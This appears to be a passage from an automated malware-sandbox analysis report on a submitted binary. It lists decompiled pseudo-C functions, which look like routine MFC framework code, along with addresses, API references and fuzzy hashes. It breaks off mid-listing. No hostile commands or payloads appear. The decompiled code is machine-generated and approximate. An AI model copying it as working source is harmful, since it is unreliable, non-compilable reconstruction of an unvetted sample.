                  Uniqueness Score: -1.00%

                  Function 0041730A, Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E0041730A(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t38;
				signed int _t40;
				intOrPtr* _t49;
				signed int _t57;
				intOrPtr* _t84;
				void* _t85;

				_push(4);
				E00431A9B(E0044B513, __ebx, __edi, __esi);
				_t82 = __ecx;
				_t38 =  *((intOrPtr*)( *__ecx + 0x6c))();
				_t84 = _t38;
				_t87 = _t84;
				if(_t84 != 0) {
					 *(_t84 + 0x4c) =  *(_t84 + 0x4c) & 0x00000000;
					_push(0);
					_push(_t84);
					_t40 =  *((intOrPtr*)( *__ecx + 0x70))();
					 *(_t85 - 0x10) = _t40;
					__eflags = _t40;
					if(__eflags != 0) {
						__eflags =  *(_t85 + 8);
						if(__eflags != 0) {
							E0040D6DD(0, _t85 + 0xb, __ecx, __eflags);
							 *(_t85 - 4) = 0;
							__eflags =  *((intOrPtr*)( *_t84 + 0x74))( *(_t85 + 8));
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t84 + 0x54))( *(_t85 + 8), 1);
								_t29 = _t85 - 4;
								 *_t29 =  *(_t85 - 4) | 0xffffffff;
								__eflags =  *_t29;
								E004119E0(0, _t85 + 0xb, _t82, _t84,  *_t29);
								goto L14;
							} else {
								 *((intOrPtr*)( *( *(_t85 - 0x10)) + 0x60))();
								 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
								E004119E0(0, _t85 + 0xb, _t82, _t84, __eflags);
								goto L2;
							}
						} else {
							_push(_t84);
							 *((intOrPtr*)( *__ecx + 0x84))();
							__eflags =  *(_t85 + 0xc);
							if( *(_t85 + 0xc) == 0) {
								 *((intOrPtr*)(_t84 + 0x50)) = 1;
							}
							_t57 =  *((intOrPtr*)( *_t84 + 0x70))();
							__eflags = _t57;
							if(_t57 != 0) {
								 *((intOrPtr*)(_t82 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x8c)) + 1;
								L14:
								 *((intOrPtr*)( *_t82 + 0x74))( *(_t85 - 0x10), _t84,  *(_t85 + 0xc));
								_t49 = _t84;
							} else {
								 *((intOrPtr*)( *( *(_t85 - 0x10)) + 0x60))();
								goto L2;
							}
						}
					} else {
						E00417146(0, __edx, __ecx, _t84, __eflags);
						 *((intOrPtr*)( *_t84 + 4))(1, 0xf104, 0, 0xffffffff);
						goto L2;
					}
				} else {
					_push(0xffffffff);
					_push(_t38);
					_push(0xf104);
					E00417146(__ebx, __edx, __ecx, _t84, _t87);
					L2:
					_t49 = 0;
				}
				return E00431B73(_t49);
			}









                  0x0041730a
                  0x00417311
                  0x00417316
                  0x0041731a
                  0x0041731d
                  0x0041731f
                  0x00417321
                  0x0041733a
                  0x00417340
                  0x00417342
                  0x00417345
                  0x0041734d
                  0x00417350
                  0x00417352
                  0x0041736c
                  0x0041736f
                  0x004173a8
                  0x004173b4
                  0x004173ba
                  0x004173bc
                  0x004173e0
                  0x004173e3
                  0x004173e3
                  0x004173e3
                  0x004173ea
                  0x00000000
                  0x004173be
                  0x004173c3
                  0x004173c6
                  0x004173cd
                  0x00000000
                  0x004173cd
                  0x00417371
                  0x00417373
                  0x00417376
                  0x0041737c
                  0x0041737f
                  0x00417381
                  0x00417381
                  0x0041738c
                  0x0041738f
                  0x00417391
                  0x0041739d
                  0x004173ef
                  0x004173fa
                  0x004173fd
                  0x00417393
                  0x00417398
                  0x00000000
                  0x00417398
                  0x00417391
                  0x00417354
                  0x0041735c
                  0x00417367
                  0x00000000
                  0x00417367
                  0x00417323
                  0x00417323
                  0x00417325
                  0x00417326
                  0x0041732b
                  0x00417330
                  0x00417330
                  0x00417330
                  0x00417404

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00417311
                    • Part of subcall function 00417146: __EH_prolog3.LIBCMT ref: 0041714D
                    • Part of subcall function 004119E0: __EH_prolog3_catch_GS.LIBCMT ref: 004119EA
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$H_prolog3_catch_
                  • String ID:
                  • API String ID: 2899319929-0
                  • Opcode ID: d39df0fc78a5d45c1090d89ee54a143fec968a8c40ed11aa394c250920cd21a2
                  • Instruction ID: ffda74f464d4dc7f0a604a0d06fefe8caa514aab76a61e0630f1065df7d55a41
                  • Opcode Fuzzy Hash: d39df0fc78a5d45c1090d89ee54a143fec968a8c40ed11aa394c250920cd21a2
                  • Instruction Fuzzy Hash: 88316B30604219EFCB20AF64C885AAEB7B1BF04314F10455AFD628B3A1DB78D981DB49
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040F62D, Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E0040F62D(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t39;
				intOrPtr _t56;
				signed int _t58;
				signed int _t62;
				intOrPtr _t70;
				signed int _t76;
				void* _t78;
				void* _t82;
				intOrPtr _t83;

				_t82 = __eflags;
				_push(0x38);
				E00431ACE(E0044B025, __ebx, __edi, __esi);
				_t56 = E00420AEC(__ebx, 0x466508, __edi, __esi, _t82, 0x406452);
				_t83 = _t56;
				 *((intOrPtr*)(_t78 - 0x18)) = _t56;
				_t84 = _t83 == 0;
				if(_t83 == 0) {
					E00406436(_t56, 0x466508, __edi, __esi, _t84);
				}
				_t4 = _t56 + 0x58; // 0x58
				_t58 = 7;
				_t39 = memcpy(_t78 - 0x44, _t4, _t58 << 2);
				_t70 =  *((intOrPtr*)(_t78 + 0x10));
				_t76 =  *(_t78 + 8);
				 *_t39 =  *(_t78 + 0xc);
				 *((intOrPtr*)(_t56 + 0x60)) =  *((intOrPtr*)(_t78 + 0x14));
				 *((intOrPtr*)(_t56 + 0x5c)) = _t70;
				 *((intOrPtr*)(_t56 + 0x64)) =  *((intOrPtr*)(_t78 + 0x18));
				 *((intOrPtr*)(_t78 - 4)) = 0;
				if(_t70 == 2 &&  *((intOrPtr*)(_t76 + 0x4c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x4c)))) + 0x60))(0);
				}
				 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
				if(_t70 == 0x110) {
					E0040D7C1(_t76, _t78 - 0x28, _t78 + 8);
				}
				 *((intOrPtr*)(_t78 + 0x18)) =  *((intOrPtr*)( *_t76 + 0x110))(_t70,  *((intOrPtr*)(_t78 + 0x14)),  *((intOrPtr*)(_t78 + 0x18)));
				if(_t70 == 0x110) {
					E0040F5B7(_t56, 0, _t76, _t78 - 0x28,  *(_t78 + 8));
				}
				_t30 = _t56 + 0x58; // 0x58
				_t62 = 7;
				return E00431B73(memcpy(_t30, _t78 - 0x44, _t62 << 2));
			}












                  0x0040f62d
                  0x0040f62d
                  0x0040f634
                  0x0040f648
                  0x0040f64e
                  0x0040f653
                  0x0040f656
                  0x0040f658
                  0x0040f65a
                  0x0040f65a
                  0x0040f65f
                  0x0040f666
                  0x0040f66a
                  0x0040f66f
                  0x0040f672
                  0x0040f675
                  0x0040f67a
                  0x0040f680
                  0x0040f683
                  0x0040f686
                  0x0040f68c
                  0x0040f699
                  0x0040f699
                  0x0040f69c
                  0x0040f6a6
                  0x0040f6b1
                  0x0040f6b1
                  0x0040f6c7
                  0x0040f6d0
                  0x0040f6da
                  0x0040f6da
                  0x0040f70f
                  0x0040f712
                  0x0040f71d

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0040F634
                    • Part of subcall function 00420AEC: __EH_prolog3.LIBCMT ref: 00420AF3
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$Exception@8H_prolog3_catchThrow
                  • String ID:
                  • API String ID: 24280941-0
                  • Opcode ID: a5e4790e460b5be2e02f3c679bf46ce18870f2b1a8203689afa57875004627af
                  • Instruction ID: 55c1a81f4b8db02ad9ddc7eda2fdd22912c5a9ef6f5b427848955299c37591cb
                  • Opcode Fuzzy Hash: a5e4790e460b5be2e02f3c679bf46ce18870f2b1a8203689afa57875004627af
                  • Instruction Fuzzy Hash: 6B217A72A00209DFCF15DFA4C4819DE3BA6FF58310F11843AF905AB691C738A985CB99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004012B0, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                  Download Yara Rule
                  C-Code - Quality: 53%
                  			E004012B0(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				intOrPtr* _t14;
				void* _t16;
				signed int _t18;
				void* _t20;
				void* _t23;
				intOrPtr _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				void* _t38;
				void* _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr* _t43;
				void* _t45;
				intOrPtr _t46;
				intOrPtr _t47;
				void* _t49;
				void* _t50;

				_t26 = __ecx;
				E00401090(__ecx, __edx, 0x8007000e);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t42 =  *_t26;
				_t24 =  *((intOrPtr*)(_t42 - 0xc));
				_t43 = _t42 - 0x10;
				 *((intOrPtr*)(_t49 + 0xc)) = _t26;
				_t14 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t43)) + 0x10))))(_t38, _t41, _t45, _t23, _t26);
				_t35 =  *_t14;
				_t46 =  *((intOrPtr*)(_t49 + 0x18));
				_t28 = _t14;
				_t16 =  *((intOrPtr*)( *((intOrPtr*)( *_t14))))(_t46, 1); // executed
				_t39 = _t16;
				if(_t39 == 0) {
					E004012B0(_t28, _t35);
				}
				if(_t24 < _t46) {
					_t46 = _t24;
				}
				_t5 = _t46 + 1; // 0x1
				_t7 = _t39 + 0x10; // 0x10
				_t47 = _t7;
				_t18 = E0043065F(_t24, _t43 + 0x10, _t47, _t5, _t43 + 0x10, _t5);
				_t50 = _t49 + 0x10;
				 *((intOrPtr*)(_t39 + 4)) = _t24;
				asm("lock xadd [edx], eax");
				_t20 = (_t18 | 0xffffffff) - 1;
				if(_t20 <= 0) {
					_t20 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t43)) + 4))))(_t43);
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x10)))) = _t47;
				return _t20;
			}






















                  0x004012b0
                  0x004012b5
                  0x004012ba
                  0x004012bb
                  0x004012bc
                  0x004012bd
                  0x004012be
                  0x004012bf
                  0x004012c4
                  0x004012c6
                  0x004012c9
                  0x004012cc
                  0x004012d8
                  0x004012da
                  0x004012dc
                  0x004012e2
                  0x004012e7
                  0x004012e9
                  0x004012ed
                  0x004012ef
                  0x004012ef
                  0x004012f6
                  0x004012f8
                  0x004012f8
                  0x004012fa
                  0x00401303
                  0x00401303
                  0x00401307
                  0x0040130c
                  0x0040130f
                  0x00401318
                  0x0040131c
                  0x0040131f
                  0x00401329
                  0x00401329
                  0x00401331
                  0x00401336

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: _memcpy_s
                  • String ID:
                  • API String ID: 2001391462-0
                  • Opcode ID: af4fe0bf2a3b28bfa50e0f5dc0aec7f342693b3242073af976542bc3b97a567a
                  • Instruction ID: cb3531059e7c9241c49a6eff8f265f17319ee8308a504db105d52463e5de0ade
                  • Opcode Fuzzy Hash: af4fe0bf2a3b28bfa50e0f5dc0aec7f342693b3242073af976542bc3b97a567a
                  • Instruction Fuzzy Hash: 701186722006059FD305EF68C880D67B3A9FF8D314B10866EE65597351EB75E901CB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405714, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E00405714(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t29;
				void* _t32;
				void* _t34;
				intOrPtr _t41;
				void* _t56;
				intOrPtr* _t60;
				void* _t61;
				void* _t62;

				_t56 = __edx;
				_push(4);
				E00431A9B(E0044ABB9, __ebx, __edi, __esi);
				_t60 = __ecx;
				_t29 =  *((intOrPtr*)(_t62 + 0x14));
				_t44 =  *((intOrPtr*)(_t62 + 8));
				 *(_t62 + 0xc) =  *(_t62 + 0xc) | 0x40000000;
				 *((intOrPtr*)(__ecx + 0xa4)) =  *((intOrPtr*)(_t62 + 8));
				if(_t29 != 0) {
					_t41 =  *((intOrPtr*)(_t29 + 8));
					if(_t41 != 0) {
						 *((intOrPtr*)(__ecx + 0xe8)) =  *((intOrPtr*)(_t41 + 0x68));
						 *((intOrPtr*)(__ecx + 0x60)) =  *((intOrPtr*)(_t41 + 0x6c));
					}
				}
				E004014C0(_t62 - 0x10, _t56);
				 *(_t62 - 4) =  *(_t62 - 4) & 0x00000000;
				E004014C0(_t62 + 8, _t56);
				 *(_t62 - 4) = 1;
				_t32 = E00402720(_t62 - 0x10, _t44);
				_t66 = _t32;
				if(_t32 != 0) {
					E0041B29E(_t62 + 8,  *((intOrPtr*)(_t62 - 0x10)), 0, 0xa);
				}
				_t34 =  *((intOrPtr*)( *_t60 + 0x194))(E00408C1D(_t44, _t60, _t66,  *(_t62 + 0xc), _t44),  *((intOrPtr*)(_t62 + 8)),  *(_t62 + 0xc), 0x46279c,  *((intOrPtr*)(_t62 + 0x10)),  *((intOrPtr*)(_t62 + 0x14)));
				_t61 = 0;
				if(_t34 != 0) {
					_t61 = 1;
				}
				E004010B0( *((intOrPtr*)(_t62 + 8)) + 0xfffffff0, _t56);
				E004010B0( *((intOrPtr*)(_t62 - 0x10)) + 0xfffffff0, _t56);
				return E00431B73(_t61);
			}











                  0x00405714
                  0x00405714
                  0x0040571b
                  0x00405720
                  0x00405722
                  0x00405725
                  0x00405728
                  0x0040572f
                  0x00405737
                  0x00405739
                  0x0040573e
                  0x00405743
                  0x0040574c
                  0x0040574c
                  0x0040573e
                  0x00405752
                  0x00405757
                  0x0040575e
                  0x00405767
                  0x0040576b
                  0x00405770
                  0x00405772
                  0x0040577f
                  0x0040577f
                  0x004057a5
                  0x004057ab
                  0x004057af
                  0x004057d1
                  0x004057d1
                  0x004057b7
                  0x004057c2
                  0x004057ce

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3
                  • String ID:
                  • API String ID: 431132790-0
                  • Opcode ID: 8a7514d54733c72b31dc1cced96e390b49405d59f9705daac9a0debe1872ddba
                  • Instruction ID: 4482dd84e3e1f924aac8e1e3bd257dd37003dfc8241748aaaf4d51b636d97771
                  • Opcode Fuzzy Hash: 8a7514d54733c72b31dc1cced96e390b49405d59f9705daac9a0debe1872ddba
                  • Instruction Fuzzy Hash: 88219F34600609EBDF00EF61C891FAF77A1EF04354F10452AF91A6B3E1DB749940DBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004247D7, Relevance: 1.6, APIs: 1, Instructions: 54COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 96%
                  			E004247D7(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t26;
				intOrPtr* _t29;
				intOrPtr _t32;
				intOrPtr* _t39;
				intOrPtr _t41;
				void* _t43;
				void* _t44;

				_push(8);
				E00431ACE(E0044C0BF, __ebx, __edi, __esi);
				_t43 = __ecx;
				_t41 =  *((intOrPtr*)(_t44 + 8));
				if(_t41 != 0) {
					_t21 = E00424500(__ecx + 0x1c, _t41, __ecx, _t41);
					__eflags = _t21;
					if(_t21 == 0) {
						_t21 = E00424500(__ecx + 0x38, _t41, __ecx, _t41);
						__eflags = _t21;
						if(_t21 == 0) {
							_t23 = E0040444A(E0041FD51);
							 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
							_t36 = _t43 + 4;
							 *((intOrPtr*)(_t44 + 8)) = _t23;
							_t32 = E0042FBA4(_t43 + 4);
							__eflags = _t32;
							if(__eflags == 0) {
								E004063FE(_t32, _t36, _t41, _t43, __eflags);
							}
							 *((intOrPtr*)(_t43 + 0x14))(_t32);
							_t26 = E004246C7(_t32, _t43 + 0x38, _t41); // executed
							 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
							 *_t26 = _t32;
							E0040444A( *((intOrPtr*)(_t44 + 8)));
							_t29 =  *((intOrPtr*)(_t43 + 0x58)) + _t32;
							 *_t29 = _t41;
							__eflags =  *((intOrPtr*)(_t43 + 0x5c)) - 2;
							if( *((intOrPtr*)(_t43 + 0x5c)) == 2) {
								 *((intOrPtr*)(_t29 + 4)) = _t41;
							}
							_t21 = _t32;
						} else {
							_t39 =  *((intOrPtr*)(__ecx + 0x58)) + _t21;
							 *_t39 = _t41;
							__eflags =  *((intOrPtr*)(__ecx + 0x5c)) - 2;
							if( *((intOrPtr*)(__ecx + 0x5c)) == 2) {
								 *((intOrPtr*)(_t39 + 4)) = _t41;
							}
						}
					}
				} else {
					_t21 = 0;
				}
				return E00431B73(_t21);
			}












                  0x004247d7
                  0x004247de
                  0x004247e3
                  0x004247e5
                  0x004247ea
                  0x004247fa
                  0x004247ff
                  0x00424801
                  0x00424807
                  0x0042480c
                  0x0042480e
                  0x00424827
                  0x0042482c
                  0x00424830
                  0x00424833
                  0x0042483b
                  0x0042483d
                  0x0042483f
                  0x00424841
                  0x00424841
                  0x00424847
                  0x0042484e
                  0x00424856
                  0x0042485a
                  0x0042485c
                  0x00424864
                  0x00424866
                  0x00424868
                  0x0042486c
                  0x0042486e
                  0x0042486e
                  0x00424871
                  0x00424810
                  0x00424813
                  0x00424815
                  0x00424817
                  0x0042481b
                  0x0042481d
                  0x0042481d
                  0x0042481b
                  0x0042480e
                  0x004247ec
                  0x004247ec
                  0x004247ec
                  0x004247f3

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3_catch
                  • String ID:
                  • API String ID: 3886170330-0
                  • Opcode ID: 3e64b9e58c0a1709a153fe20580ef6c84a7755400a5b5cf31e2b7dbd7f5a3b76
                  • Instruction ID: 9197f78ff889db5bb5e608a4bb7d9c8daaa65afafdfa0369e7aef5d3225350aa
                  • Opcode Fuzzy Hash: 3e64b9e58c0a1709a153fe20580ef6c84a7755400a5b5cf31e2b7dbd7f5a3b76
                  • Instruction Fuzzy Hash: 5111C1747007509BC720EF26E94166AB7E0EFD1318B90853EE942976A1EB38E905CB18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00412F2D, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E00412F2D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t19;
				intOrPtr _t24;
				intOrPtr* _t27;
				void* _t30;
				signed int* _t32;
				void* _t33;

				_t20 = __ebx;
				_push(4);
				E00431A9B(E0044B3B5, __ebx, __edi, __esi);
				_t30 = __ecx;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0x451568;
				_t32 = 0x451510;
				do {
					_t16 =  *(_t33 + 8) &  *_t32;
					if(( *(_t33 + 8) &  *_t32 & 0x0000f000) != 0) {
						_t5 = _t32 - 4; // 0xe81b
						_t16 = E00409833(_t30,  *_t5);
						_t36 = _t16;
						if(_t16 == 0) {
							_t24 = E00404461(_t36, 0xc4);
							 *((intOrPtr*)(_t33 - 0x10)) = _t24;
							 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
							_t37 = _t24;
							if(_t24 == 0) {
								_t19 = 0;
								__eflags = 0;
							} else {
								_t19 = E004133F9(_t20, _t24, _t30, _t32, _t37, 0);
							}
							_t9 = _t32 - 4; // 0xe81b
							_push( *_t9);
							 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
							_push( *_t32 | 0x56000000);
							_push(_t30);
							_t27 = _t19; // executed
							if( *((intOrPtr*)( *_t19 + 0x17c))() == 0) {
								_t16 = E0042280E(_t27);
							}
						}
					}
					_t32 =  &(_t32[2]);
				} while (_t32 < "iDockFrameWnd");
				return E00431B73(_t16);
			}









                  0x00412f2d
                  0x00412f2d
                  0x00412f34
                  0x00412f39
                  0x00412f3b
                  0x00412f45
                  0x00412f4a
                  0x00412f4d
                  0x00412f54
                  0x00412f56
                  0x00412f5b
                  0x00412f60
                  0x00412f62
                  0x00412f6f
                  0x00412f71
                  0x00412f74
                  0x00412f78
                  0x00412f7a
                  0x00412f85
                  0x00412f85
                  0x00412f7c
                  0x00412f7e
                  0x00412f7e
                  0x00412f87
                  0x00412f87
                  0x00412f8e
                  0x00412f98
                  0x00412f99
                  0x00412f9a
                  0x00412fa4
                  0x00412fa6
                  0x00412fa6
                  0x00412fa4
                  0x00412f62
                  0x00412fab
                  0x00412fae
                  0x00412fbb

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00412F34
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                    • Part of subcall function 004133F9: __EH_prolog3.LIBCMT ref: 00413400
                    • Part of subcall function 004133F9: SetRectEmpty.USER32(?), ref: 00413450
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$EmptyRect_malloc
                  • String ID:
                  • API String ID: 1428422903-0
                  • Opcode ID: 560d92e6b4d70705552a0594c27aa58a280f84e0716ba0d81986ee05fcab5f08
                  • Instruction ID: 60c52bf7d0ee18840f249dcd26fc2cf3d101614bcbc1bdb70064cbc4ec598c8f
                  • Opcode Fuzzy Hash: 560d92e6b4d70705552a0594c27aa58a280f84e0716ba0d81986ee05fcab5f08
                  • Instruction Fuzzy Hash: 66014C31700205ABEB18EF21C9167AEB2B0AF40304F00462FE856D73D1EBBC8D51965D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004134C3, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                  Download Yara Rule
                  C-Code - Quality: 44%
                  			E004134C3(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				struct tagRECT* _v12;
				char _v28;
				void* __ebx;
				void* __edi;
				struct tagRECT* _t17;
				void* _t19;
				void* _t20;
				intOrPtr* _t30;

				_t20 = __ecx;
				_v8 =  *(__ecx + 0xb0);
				_t17 = __ecx + 0xb4;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t30 = _a8;
				_v12 = _t17;
				 *(__ecx + 0xb0) = 0 |  *_t30 == 0x00000000;
				CopyRect(_t17, _t30 + 4);
				_t19 = E004217B7(_t20, _t20,  &_v28, _a4, _t30); // executed
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *(_t20 + 0xb0) = _v8;
				return _t19;
			}












                  0x004134cc
                  0x004134d6
                  0x004134d9
                  0x004134e4
                  0x004134e5
                  0x004134e6
                  0x004134e9
                  0x004134ea
                  0x004134ef
                  0x004134f5
                  0x00413500
                  0x0041350c
                  0x0041351a
                  0x0041351b
                  0x0041351c
                  0x0041351d
                  0x00413520
                  0x00413528

                  APIs
                  • CopyRect.USER32 ref: 00413500
                    • Part of subcall function 004217B7: CopyRect.USER32 ref: 004217F2
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CopyRect
                  • String ID:
                  • API String ID: 1989077687-0
                  • Opcode ID: c4ecb7844e15528e9adc428bcb3507418fde64d8842dc894b86e224a8e58c7ec
                  • Instruction ID: cc5e8473d09934e6d7ff24cff4c9ac1d1a160460a925aeff77e35e501553fd45
                  • Opcode Fuzzy Hash: c4ecb7844e15528e9adc428bcb3507418fde64d8842dc894b86e224a8e58c7ec
                  • Instruction Fuzzy Hash: CC018176900704ABCB05DF99D8819DBBBBAFF46320F04017EFD0AAB201D7716A04CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00427502, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E00427502(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				void* _t18;
				void* _t21;
				void* _t29;
				intOrPtr* _t34;
				void* _t35;

				_push(0x7c);
				E00431A9B(E0044C3A0, __ebx, __edi, __esi);
				_t16 =  *((intOrPtr*)(__ecx + 0x10));
				_t37 = _t16;
				if(_t16 != 0) {
					__eflags = _t16 - 1;
					_t31 =  *((intOrPtr*)(__ecx + 8));
					_t34 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + 8));
					if(_t16 <= 1) {
						L5:
						_t18 =  *((intOrPtr*)( *_t34 + 0x80))(0, 1);
					} else {
						E00427285(_t35 - 0x88, __ecx + 4);
						 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
						_t21 = E00417C2D(__ebx, _t35 - 0x88, _t31, __edi, _t34, __eflags);
						 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t35 - 0x88)) = 0x4540cc;
						_t29 = _t35 - 0x88;
						__eflags = _t21 - 1;
						if(__eflags != 0) {
							_t18 = E004174FB(_t29, __edi, _t34, __eflags);
						} else {
							_t34 =  *((intOrPtr*)(_t35 - 0x10));
							E004174FB(_t29, __edi, _t34, __eflags);
							goto L5;
						}
					}
				} else {
					_push(0xffffffff);
					_push(_t16);
					_push(0xf104);
					_t18 = E00417146(__ebx, __edx, __edi, __esi, _t37);
				}
				return E00431B73(_t18);
			}









                  0x00427502
                  0x00427509
                  0x0042750e
                  0x00427511
                  0x00427513
                  0x00427524
                  0x00427527
                  0x0042752a
                  0x0042752d
                  0x0042756e
                  0x00427576
                  0x0042752f
                  0x00427539
                  0x0042753e
                  0x00427548
                  0x0042754d
                  0x00427551
                  0x0042755b
                  0x00427561
                  0x00427564
                  0x00427582
                  0x00427566
